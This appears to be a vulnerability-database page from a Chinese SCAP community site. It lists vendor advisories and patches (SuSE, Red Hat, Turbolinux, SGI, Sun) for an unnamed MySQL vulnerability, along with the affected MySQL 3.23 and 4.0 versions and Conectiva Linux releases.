
SuSE has released security advisory SuSE-SA:2003:042 to address this issue.

Turbolinux has released an advisory TLSA-2003-56 to address this issue. Please see the referenced advisory for detailed upgrade instructions.

Red Hat has released advisory RHSA-2003:281-01 to address this issue. See referenced advisory for additional information.

Red Hat has released advisory RHSA-2003:282-06 to address this issue in their Linux Enterprise software. Relevant patches are available through the Red Hat Network. See the referenced advisory for additional details.

SGI has released an advisory (20031002-01-U) pertaining to their ProPack Linux distribution. The advisory has been released in response to a number of RHSA advisories, and includes a patch (Patch 10027) containing updated RPM packages relating to 22 different BIDS.

Patch 10027 can be obtained via the following link:
http://support.sgi.com/

For information regarding how to obtain individual RPM packages included in Patch 10027, please see the attached advisory.

Sun has released an update to address this issue for RaQ550. Please see the referenced web page for more information.

Sun has released fixes for Sun Linux.

Sun has released an update to address this issue for Qube3. Please see the referenced web page for more information.


MySQL AB MySQL 4.1.0-0

MySQL AB MySQL 4.1.0.0-alpha

MySQL AB MySQL 3.23.36

MySQL AB MySQL 3.23.37

MySQL AB MySQL 3.23.44

MySQL AB MySQL 3.23.47

MySQL AB MySQL 3.23.48

MySQL AB MySQL 3.23.52

MySQL AB MySQL 3.23.53

MySQL AB MySQL 3.23.54

MySQL AB MySQL 3.23.54 a

MySQL AB MySQL 3.23.55

MySQL AB MySQL 3.23.56

MySQL AB MySQL 3.23.58

MySQL AB MySQL 4.0 .0

MySQL AB MySQL 4.0.1

MySQL AB MySQL 4.0.10

MySQL AB MySQL 4.0.11 -gamma

MySQL AB MySQL 4.0.11

MySQL AB MySQL 4.0.12

MySQL AB MySQL 4.0.13

MySQL AB MySQL 4.0.14

MySQL AB MySQL 4.0.2

MySQL AB MySQL 4.0.3

MySQL AB MySQL 4.0.4

MySQL AB MySQL 4.0.5

MySQL AB MySQL 4.0.5 a

MySQL AB MySQL 4.0.6

MySQL AB MySQL 4.0.7 -gamma

MySQL AB MySQL 4.0.7

MySQL AB MySQL 4.0.8 -gamma

MySQL AB MySQL 4.0.8

MySQL AB MySQL 4.0.9 -gamma

MySQL AB MySQL 4.0.9

Conectiva Linux 7.0

Conectiva Linux 8.0

Conectiva Linux 9.0

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站